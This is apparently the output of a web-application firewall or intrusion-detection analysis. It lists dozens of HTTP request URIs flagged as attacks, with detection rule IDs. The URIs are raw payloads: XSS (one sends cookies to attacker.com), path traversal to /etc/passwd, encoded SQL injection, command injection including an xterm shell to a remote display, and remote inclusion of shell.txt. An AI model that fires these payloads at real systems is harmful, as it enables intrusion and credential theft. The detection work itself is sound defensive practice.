---------------------- Statistics of URIs analyzed------------------------
[83] input, [23] clean, [60] attacks
--------------------------- Analysis results -----------------------------
Packet [3]	/error/500error.jsp?et=1%3Cscript%3Ealert%28%27KPMG%27%29%3C/script%3E	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [4]	/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09la_rata%40hotmail%2Ees	Nattacks [2]	[932100]	[949110]
Packet [5]	/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22	Nattacks [5]	[920440]	[941100]	[941110]	[941160]	[949110]
Packet [7]	/cgi-dos/args.cmd?%22&any%2Bdos%2Bcommand%22%0D	Nattacks [3]	[920440]	[921150]	[949110]
Packet [8]	/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
Packet [9]	/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [10]	/cgi-bin/PiIOrLma9uJV.php?configure=../../../../../../../../etc/passw	Nattacks [3]	[930100]	[930110]	[949110]
Packet [11]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69o%6e%20sel%65%63t%20%6f%72d%28s%75bst%72in%67%28use%72%5f%70as%73%77o%72%64	Nattacks [3]	[942190]	[942360]	[949110]
Packet [13]	/cgi-bin/webboard/generate.cgi/?content=../../../../../../../../../directory/file%00&board=boardsname	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
Packet [14]	/cgi-bin/math_sum.mscgi?a=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&b=	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
Packet [15]	/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts%0D	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
Packet [16]	/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Edocument.write%28%22%3Cimg%20src=http://attacker.com/%22%20%2B%20document.cookie%20%2B%20%22%3E%22%29%3C/SCRIPT%3E%22	Nattacks [6]	[920440]	[941100]	[941110]	[941160]	[941180]	[949110]
Packet [17]	/eManager/Email%20Management/cgi-bin/SpamExcp.dll	Nattacks [2]	[920440]	[949110]
Packet [18]	/PHPLibrary-1.5.3/example/lib/stphpapplication.php?cfg_dir=http://www.atacante.com/shell.txt?&	Nattacks [2]	[931120]	[949110]
Packet [19]	/shoutbox.php?conf=../../../../../../../../etc/passwd	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [20]	/news.php?day=true&notice=-1%20UNION%20ALL%20SELECT%201%2C%27long%27%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C1	Nattacks [3]	[942190]	[942360]	[949110]
Packet [21]	/PHPLibrary-1.5.3/example/lib/grid3.lib.php?cfg_dir=http://www.atacante.com/shell.txt?&	Nattacks [2]	[931120]	[949110]
Packet [22]	/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%40D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00	Nattacks [3]	[920220]	[920270]	[949110]
Packet [24]	/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm	Nattacks [3]	[930100]	[930110]	[949110]
Packet [25]	/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [26]	/servlet/Sygate.Servlet.login?uid=%27%3bupdate%20CMS35%2eAdmin%20set%20Password%3dcast%28%27AA%27%20as%20varbinary%29%20%2d%2d%20&up=foo	Nattacks [3]	[942350]	[942360]	[949110]
Packet [28]	/calendar_admin.pl?config=%7Ccat%20/etc/passwd%7C	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
Packet [29]	/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
Packet [31]	/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1%0D	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
Packet [32]	/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Ealert%28%26quot%3B%26%23x20%3BXSS%26%23x20%3BTest%26%23x20%3BSuccessful%26quot%3B%29%3E%3C/SCRIPT%3E%22	Nattacks [5]	[920440]	[941100]	[941110]	[941160]	[949110]
Packet [33]	/servlet/org.apache.catalina.Globals/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E	Nattacks [2]	[941110]	[949110]
Packet [34]	/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/hosts%00.html&passurl=/category/	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
Packet [35]	/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999%2Bunion%2Bselect%2Bshchaans%2Bas%2Bmestname	Nattacks [3]	[942190]	[942360]	[949110]
Packet [36]	/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c%2Bver	Nattacks [3]	[930100]	[930110]	[949110]
Packet [37]	/cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [38]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6ei%6f%6e%20sel%65ct%20%6f%72%64%28s%75%62s%74%72in%67%28%75s%65%72%5f%70%61s%73%77%6fr%64	Nattacks [3]	[942190]	[942360]	[949110]
Packet [42]	/cgi-bin/loadpage.cgi?user_id=id&file=.%7C./.%7C./.%7C./.%7C./.%7C./etc/passwd%00.html	Nattacks [5]	[920270]	[930120]	[932105]	[932160]	[949110]
Packet [43]	/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/passwd&ResultStyle=simple&ResultCount=20&collection=books	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [46]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75nio%6e%20s%65%6cec%74%20%6f%72%64%28%73%75%62%73tr%69ng%28%75s%65%72%5fpas%73%77o%72d%2c%32%2c%31%29%29%20%66%72o%6d%20%70hpb%62_u%73%65r%73%20%77h%65%72e%20u%73e%72_id%3d2/%2A&view=newest	Nattacks [4]	[942190]	[942270]	[942360]	[949110]
Packet [47]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69%6f%6e%20s%65le%63t%20%6frd%28%73u%62s%74%72in%67%28us%65r%5fp%61s%73%77or%64	Nattacks [3]	[942190]	[942360]	[949110]
Packet [48]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73%65l%65%63%74%20o%72d%28subst%72i%6e%67%28%75s%65r_passw%6fr%64	Nattacks [3]	[942190]	[942360]	[949110]
Packet [50]	/cgi-bin/calendar_admin.pl?config=%7Ccat%20/etc/passwd%7C	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
Packet [52]	/cgi-bin/day5datacopier.cgi?distloc=%3B/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh%0D	Nattacks [3]	[932105]	[932160]	[949110]
Packet [53]	/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/host.allow%00.html&passurl=/category/	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
Packet [58]	/mrtg.cgi?cfg=../../../../../../../../etc/passwd	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [59]	/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [61]	/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/motd%00	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
Packet [64]	/servlet/org.apache.catalina.ContainerServlet/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E	Nattacks [2]	[941110]	[949110]
Packet [65]	/_vti_inf.php?user_name=%20_friends&count=%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [66]	/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3E%3C%21--%23exec%20cmd=%22cat%20/etc/passwd%22--%3E%3C/SCRIPT%3E%22	Nattacks [8]	[920440]	[930120]	[932160]	[941100]	[941110]	[941160]	[941180]	[949110]
Packet [67]	/cgi-bin/way-board.cgi?db=/etc/passwd%00	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
Packet [68]	/forum/database/philboard.mdb	Nattacks [2]	[920440]	[949110]
Packet [69]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73%65%6cect%20or%64%28%73ub%73t%72in%67%28%75s%65r%5f%70assw%6f%72d%2c29	Nattacks [3]	[942190]	[942360]	[949110]
Packet [70]	/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../directory	Nattacks [3]	[930100]	[930110]	[949110]
Packet [71]	/scripts/w3who.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Nattacks [2]	[920440]	[949110]
Packet [72]	/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1%27%20INTO%20OUTFILE%20%27/vt.txt	Nattacks [2]	[942190]	[949110]
Packet [73]	/inc/sendmail.inc	Nattacks [2]	[920440]	[949110]
Packet [74]	/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/hosts%00	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
Packet [75]	/cgi-bin/p-news.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%250	Nattacks [5]	[920220]	[930100]	[930110]	[930120]	[949110]
Packet [76]	/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2Bwin.ini	Nattacks [3]	[930100]	[930110]	[949110]
Packet [78]	/sresult.exe?cam=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E	Nattacks [5]	[941100]	[941110]	[941160]	[941180]	[949110]
Packet [80]	/scripts/ISAPISkeleton.dll?%3Cscript%3Ealert%28%22Ooops%21%22%29%3C/script%3E	Nattacks [5]	[920440]	[941100]	[941110]	[941160]	[949110]
Packet [81]	/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl%7C%0D	Nattacks [4]	[930100]	[930110]	[932160]	[949110]
Packet [82]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69o%6e%20%73%65le%63%74%20ord%28%73%75b%73%74%72in%67%28%75s%65%72%5fp%61%73%73%77ord%2c%315	Nattacks [3]	[942190]	[942360]	[949110]
Packet [83]	/cgi-bin/ion-p?page=../../../../../etc/hosts	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
